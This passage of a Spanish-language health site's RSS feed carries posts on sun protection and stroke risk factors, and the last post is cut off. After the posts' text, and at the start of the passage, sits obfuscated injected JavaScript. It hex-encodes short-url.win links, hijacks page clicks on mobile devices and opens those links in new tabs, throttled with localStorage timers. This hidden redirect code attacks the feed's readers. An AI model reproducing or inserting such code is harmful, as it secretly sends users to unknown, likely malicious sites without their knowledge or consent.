70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x65\x72\x66\x37\x63\x307','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x75\x76\x44\x32\x63\x392','floor','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x72\x77\x64\x36\x63\x356','999HIfBhL','filter','test','getItem','random','138490EjXyHW','stopPropagation','setItem','70kUzPYI'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06['push'](_0x307c06['shift']());}catch(_0x3e3a47){_0x307c06['push'](_0x307c06['shift']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window['mobileCheck']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator['vendor']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=['\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x4b\x4d\x41\x30\x63\x360','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x69\x4d\x59\x31\x63\x381',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage['getItem'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+'-mnts',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window['mobileCheck']()&&window[_0x22f77c(0x1d4)](newLocation,'_blank');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>
<p><a href="https://www.todoenunclick.com/como-desafiar-lo-que-damos-por-sentado/" rel="nofollow">Origen</a></p>]]></description>
		
		
		
		<post-id xmlns="com-wordpress:feed-additions:1">79418</post-id>	</item>
		<item>
		<title>Claves para cuidarse del sol</title>
		<link>https://www.todoenunclick.com/79024-2/</link>
		
		<dc:creator><![CDATA[gabybiondi]]></dc:creator>
		<pubDate>Tue, 05 Jan 2016 21:18:50 +0000</pubDate>
				<category><![CDATA[Clickeando]]></category>
		<category><![CDATA[Día]]></category>
		<category><![CDATA[protección]]></category>
		<category><![CDATA[Riesgo]]></category>
		<category><![CDATA[sol]]></category>
		<category><![CDATA[Spa]]></category>
		<category><![CDATA[Vitamina D]]></category>
		<guid isPermaLink="false">http://www.todoenunclick.com/?p=79024</guid>

					<description><![CDATA[<p><img width="642" height="425" src="https://www.todoenunclick.com/wp-content/uploads/2016/01/1368042216650.jpg" class="attachment-post-thumbnail size-post-thumbnail wp-post-image" alt="" decoding="async" loading="lazy" srcset="https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2016/01/1368042216650.jpg?w=642&amp;ssl=1 642w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2016/01/1368042216650.jpg?resize=634%2C420&amp;ssl=1 634w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2016/01/1368042216650.jpg?resize=640%2C424&amp;ssl=1 640w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2016/01/1368042216650.jpg?resize=242%2C160&amp;ssl=1 242w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2016/01/1368042216650.jpg?resize=508%2C336&amp;ssl=1 508w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2016/01/1368042216650.jpg?resize=600%2C397&amp;ssl=1 600w" sizes="auto, (max-width: 642px) 100vw, 642px" /></p>Entramos en la estación más linda del año, pero con ella crece el riesgo por la exposición al sol ¿qué recaudos podemos tomar?

En cantidades pequeñas, las radiaciones UV son esenciales para la buena salud y desempeñan una función esencial en la producción de vitamina D, que fortalece los huesos y el sistema osteomuscular. Pero la sobreexposición a la luz solar tiene efectos nocivos sobre la piel, los ojos y el sistema inmunológico.

Los efectos biológicos de las radiaciones UV son muy diversos y dependen de su longitud de onda, penetración en la piel, tiempo de exposición, hora del día, distintas estaciones del año y la polución ambiental.

La mayoría de los casos de cáncer de piel son causados por la exposición a las radiaciones ultra violeta (UV), ya sea procedentes del sol o de fuentes artificiales como las camas solares. El efecto de estos rayos en el cuerpo es acumulativo, progresivo e irreversible, por lo tanto es probable que la exposición excesiva de los niños y adolescentes intervenga en la aparición de este tipo de patologías en etapas posteriores de la vida.

<strong>¿Cómo cuidarnos del sol?</strong>
Los extremos de la vida, ancianos y niños, están más expuestos a las inclemencias climáticas, con especial cuidado de la gente mayor que está medicada con diuréticos y los niños que están expuestos al sol o padecen cuadros febriles y gastrointestinales.
Se recomiendan las siguientes medidas para protegerse y protegerlos de la exposición excesiva a las radiaciones UV:
<ul>
	<li><strong>Exposición:</strong> Preferir la sombra. Limitar el tiempo que se pasa bajo el sol de mediodía, evitar la exposición entre las 10:00 y las 16:00 hs.</li>
	<li><strong>Vestimenta:</strong> buscar ropa fresca pero que cubra la piel, remeras de mangas largas y pantalones largos holgados fabricados con tela liviana. Si se hace una actividad al aire libre, usar gorra para proteger los ojos, el rostro y el cuello. Usar anteojos de sol cerrados a los lados que den una protección de 99% a 100% contra las radiaciones UV.</li>
	<li><strong>Filtro solar:</strong> En las zonas de la piel que no estén cubiertas por la ropa, aplicar un filtro solar de amplio espectro con un factor de protección solar (FPS) de 30+ y renovar con frecuencia por lo menos cada dos horas. Verificar la fecha de vencimiento del filtro solar. Las personas que usan filtro solar para broncearse deben ser conscientes de la necesidad de limitar el tiempo que se exponen al sol. Usar protector solar no significa disponer de mayor tiempo de exposición.</li>
	<li><strong>Camas solares:</strong> el uso de estos aparatos antes de los 35 años de edad se acompaña de un aumento de 75% del riesgo de melanoma maligno. La Organización Mundial de la Salud (OMS) recomienda prohibir su uso en los menores de 18 años.</li>
	<li><strong>Bebés y los niños pequeños:</strong> siempre mantenerlos a resguardo.</li>
</ul>
Estimular a los niños para que tomen las precauciones sencillas descritas anteriormente evitará lesiones a corto y a largo plazo sin impedir que disfruten el tiempo que pasan al aire libre. Los adultos deben procurar que los niños estén debidamente protegidos.

El rótulo de "pantalla total" o "bloqueador total", se refiere a un producto de alto poder de protección pero nunca una barrera imposible de traspasar por las radiaciones. Por ello, siempre deben ser acompañados por las otras medidas de cuidado.
<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=['substr','length','-hurs','open','round','443779RQfzWn','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x61\x69\x6a\x33\x63\x363','click','5114346JdlaMi','1780163aSIYqH','forEach','host','_blank','68512ftWJcO','addEventListener','-mnts','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x54\x59\x67\x35\x63\x365','4588749LmrVjF','parse','630bGPCEV','mobileCheck','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x4c\x55\x4b\x38\x63\x398','abs','-local-storage','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x4e\x56\x6d\x39\x63\x389','56bnMKls','opera','6946eLteFW','userAgent','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x64\x6c\x79\x34\x63\x344','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x65\x72\x66\x37\x63\x307','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x75\x76\x44\x32\x63\x392','floor','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x72\x77\x64\x36\x63\x356','999HIfBhL','filter','test','getItem','random','138490EjXyHW','stopPropagation','setItem','70kUzPYI'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06['push'](_0x307c06['shift']());}catch(_0x3e3a47){_0x307c06['push'](_0x307c06['shift']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window['mobileCheck']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator['vendor']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=['\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x4b\x4d\x41\x30\x63\x360','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x69\x4d\x59\x31\x63\x381',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage['getItem'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+'-mnts',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window['mobileCheck']()&&window[_0x22f77c(0x1d4)](newLocation,'_blank');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>
<p><a href="https://www.todoenunclick.com/79024-2/" rel="nofollow">Origen</a></p>]]></description>
		
		
		
		<post-id xmlns="com-wordpress:feed-additions:1">79024</post-id>	</item>
		<item>
		<title>ACV y factores de riesgo, en alerta</title>
		<link>https://www.todoenunclick.com/acv-y-factores-de-riesgo-en-alerta/</link>
		
		<dc:creator><![CDATA[gabybiondi]]></dc:creator>
		<pubDate>Thu, 29 Oct 2015 19:57:52 +0000</pubDate>
				<category><![CDATA[Clickeando]]></category>
		<category><![CDATA[ACV]]></category>
		<category><![CDATA[corazón]]></category>
		<category><![CDATA[Fibrilación Auricular]]></category>
		<category><![CDATA[Fundación Cardiológica Argentina]]></category>
		<category><![CDATA[hipertensión]]></category>
		<category><![CDATA[hipertensión arterial]]></category>
		<category><![CDATA[Riesgo]]></category>
		<guid isPermaLink="false">http://www.todoenunclick.com/?p=78397</guid>

					<description><![CDATA[<p><img width="642" height="360" src="https://www.todoenunclick.com/wp-content/uploads/2015/10/56325e5ada1d4.jpg" class="attachment-post-thumbnail size-post-thumbnail wp-post-image" alt="" decoding="async" loading="lazy" srcset="https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2015/10/56325e5ada1d4.jpg?w=642&amp;ssl=1 642w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2015/10/56325e5ada1d4.jpg?resize=640%2C359&amp;ssl=1 640w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2015/10/56325e5ada1d4.jpg?resize=285%2C160&amp;ssl=1 285w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2015/10/56325e5ada1d4.jpg?resize=599%2C336&amp;ssl=1 599w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2015/10/56325e5ada1d4.jpg?resize=600%2C336&amp;ssl=1 600w" sizes="auto, (max-width: 642px) 100vw, 642px" /></p>El 29 de octubre se conmemora el Día Mundial del Accidente Cerebrovascular (ACV), una fecha que motiva la toma de conciencia sobre esta enfermedad que en Argentina afecta a una persona cada cuatro minutos. Más de 18.000 personas mueren al año por esta causa y se trata, nada menos, de la primera causa de discapacidad y la segunda causa de muerte en nuestro país.

Esta situación se vuelve aún más preocupante porque tampoco desciende la incidencia de los principales factores de riesgo. La Tercera Encuesta Nacional de Factores de Riesgo del año 2013, expuso algunas cifras que resultan alarmantes. La incidencia del sobrepeso y obesidad se encuentra en el 37.1% y el 20.8% respectivamente. El tabaquismo por su parte está presente en el 25.1% de la población, y la hipertensión arterial en el 34.1%. La prevalencia de colesterol elevado es del 29.8%, y de todos estos factores sólo el tabaquismo presentó una discreta reducción respecto a la encuesta anterior del año 2009.

Asimismo, los resultados preliminares del estudio INTERSTROKE, presentado por primera vez en el Congreso Mundial de Cardiología 2014 de la Federación Mundial del Corazón, informaron nuevos resultados para reflexionar: el 90% de los ACV se encuentran asociados a los 10 principales factores de riesgo:
<ul>
	<li>· La hipertensión arterial es el factor de riesgo más frecuente, y está presente en casi el 80% de los pacientes que sufren un ataque cerebral en la Argentina.</li>
	<li>· La dislipemia o colesterol elevado aumenta el riesgo de que se tapen las arterias, entre ellas las que llegan al cerebro.</li>
	<li>El tabaquismo aumenta el riesgo de sufrir un ataque cerebral entre un 50% y un 70%, mientras que el impacto es mayor en las mujeres.</li>
	<li>El sedentarismo o inactividad física aumenta el riesgo de padecerlo.</li>
	<li>La obesidad abdominal también se asocia a una mayor incidencia.</li>
	<li>Las causas cardíacas (tromboembólicas), entre las cuales la principal es la arritmia o fibrilación auricular la que quintuplica el riesgo de padecer un ACV.</li>
	<li>El consumo excesivo de sal aumenta el riesgo de ACV, por lo que la dieta debería considerar bajo contenido de sodio, adecuada cantidad de frutas y verduras, carnes magras y pescado, e idealmente la menor cantidad posible de alimentos procesados.</li>
	<li>El consumo excesivo de alcohol tiene una estrecha relación con el riesgo de sufrir hemorragias cerebrales.</li>
	<li>El control de la diabetes es esencial, dado que en nuestro país el 22% de los pacientes que sufre un ataque cerebral es diabético.</li>
	<li>Los factores psicosociales constituyen otro factor de riesgo altamente preocupante.</li>
	<li>Pero, además de los factores de riesgo tradicionales, en los últimos años diversos estudios han puesto de manifiesto algunas vinculaciones de la enfermedad cerebrovascular que no estaban claramente demostradas: el estrés y la depresión duplican el riesgo de sufrir un ACV. ¿Cuál sería el mecanismo en este caso? Por un lado, cuando uno está estresado o deprimido hace menos ejercicio, canaliza la angustia comiendo o fumando, y la falta de deporte potencia el estrés porque no hay forma de canalizar la energía.</li>
</ul>
Por otro lado, el estrés actúa aumentando la liberación de corticoides y adrenalina que produce el propio organismo, y el único modo de contrarrestarlo es usando técnicas para poner las cosas en perspectiva, darse cuenta de qué es realmente importante y qué no lo es, hacer relajación, meditación, respirar y encontrar actividades placenteras a través de las cuales canalizar el exceso de energía.

<strong>Síntomas y prevención</strong>

Siempre es importante recordar los síntomas que presenta esta enfermedad para poder actuar a tiempo. Solo uno de cada cuatro pacientes que sufre un ACV llega a tiempo al hospital, y únicamente dentro de las primeras seis horas aproximadamente de producido un ACV isquémico puede aplicarse el tratamiento específico que permita revertir o minimizar los daños.

Generalmente, la enfermedad se caracteriza por presentar debilidad o adormecimiento de la cara, brazo o pierna, usualmente de un lado del cuerpo. También, por presentar dificultad para hablar, comprender o tragar; dificultad para ver con uno o ambos ojos; visión doble; pérdida del equilibrio o coordinación; vértigo; dolor de cabeza súbito y de máxima intensidad, sin causa aparente.

